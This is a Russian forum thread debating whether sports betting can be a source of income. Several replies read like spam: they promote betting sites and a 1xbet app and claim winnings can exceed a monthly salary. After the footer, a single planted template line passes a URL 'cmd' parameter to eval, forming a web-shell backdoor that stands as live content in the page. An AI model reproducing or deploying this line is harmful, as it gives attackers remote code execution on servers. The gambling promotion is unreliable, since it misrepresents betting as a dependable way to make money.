+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Стоит ли рассматривать ставки как способ заработать?


  1. #1
    Мимо проходил Hommy is on a distinguished road Аватар для Hommy
    Регистрация
    18.12.2018
    Откуда
    ...
    Машина
    Бричка
    Сообщений
    10

    Стоит ли рассматривать ставки как способ заработать?

    Привет всем! Форумчане, скажите, кто делал ставки? Стоит ли вообще рассматривать ставки как способ заработать? Кто что может сказать по данному вопросу?

  2. #2
    Мимо проходил Oxoxo is on a distinguished road Аватар для Oxoxo
    Регистрация
    13.02.2019
    Сообщений
    12
    Добрый вечер! Я бы так сказал, что заработать точно не получится, но немного поднять наверное можно, опять таки все зависит от Ваших знаний в этой области.

  3. #3
    Мимо проходил ssnow is on a distinguished road Аватар для ssnow
    Регистрация
    29.06.2020
    Откуда
    ...
    Машина
    Жигули
    Сообщений
    9
    Добрый вечер! А какой спорт Вас интересует? И вообще, как постоянную работу ставки точно не стоит рассматривать, а вот как доп заработок, почему бы и нет. лично смотрю футбол и уже могу примерно сказать, чем закончиться дело. Посмотрите, вот здесь к примеру есть информация о ставках на футбол https://pro100bet.ru/futzal/

  4. #4
    Мимо проходил Kollins is on a distinguished road Аватар для Kollins
    Регистрация
    05.01.2019
    Машина
    Вольц
    Сообщений
    11
    Я один раз поставил и прогорел, благо крохи потратил, не умею, и смею предположить, что новичкам здесь не повезет, так что наверное Вам стоит поискать другую работу.

  5. #5
    Мимо проходил Кипер is on a distinguished road Аватар для Кипер
    Регистрация
    24.10.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    79
    Мне тоже пришла такая мысль, где бы немного заработать дополнительных денег, все равно сколько не дай, всегда нехватает)). И друзья рассказали о официальном мобильном приложении, которое можно скачать вот тут https://android-station.ru/sportivnye/3134-1xbet.html бесплатно на Андроид и делать ставки на спорт, зарабатывая таким образом неплохие деньги. Но я первое время делал небольшие ставки, где-то выигрывал, где-то проигрывал пока не разобрался что к чему. Сейчас тоже всякое бывает, но с опытом и денег больше зарабатывается, часто даже больше моей месячной зарплаты, но не так часто как бы мне хотелось. Попробуйте, возможно это как раз то, что Вы ищете.
    Последний раз редактировалось Кипер; 22.07.2021 в 22:02.

  6. #6
    Мимо проходил Rita25 is on a distinguished road Аватар для Rita25
    Регистрация
    26.11.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    Нужно обладать определенными знаниями, не верить в чудеса и банальное везение, а вникать в это. Просто так не выиграть. К ставке нужно подготовиться. Если вы разбираетесь в спорте, готовы уделять изучению определенной информации время, читать прогнозы и пр., тогда стоит себя в этом попробовать. Осуществляйте ставки через легально работающие букмекерские конторы. К примеру, приложение БК https://sport.ua/betting/bookmakers/1xbet/android - это одна из самых популярных и надежных букмекерских контор.

  7. #7
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    тоже ищу хорошие варианты. кто что подскажет от себя?

  8. #8
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Ставки можно рассматривать как дополнительный источник денег, но никак не основной, потому что это, всё же, риски. Советую посетить сайт https://hokeybet.ru/chekhija/ , тут достаточно полезной информации по ставкам на хоккей Чехии, думаю, вам информация пригодится и в целом будет полезной, особенно если вы новичок в этом деле.

+ Ответить в теме

Похожие темы

  1. Ответов: 19
    Последнее сообщение: 07.12.2023, 11:51
  2. Ответов: 2
    Последнее сообщение: 03.05.2023, 16:09
  3. Ответов: 9
    Последнее сообщение: 02.05.2023, 21:06
  4. Ответов: 1
    Последнее сообщение: 31.01.2021, 15:56
  5. Способ удовлетворения
    от Назар8 в разделе Авто спорт
    Ответов: 2
    Последнее сообщение: 05.12.2020, 12:43

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}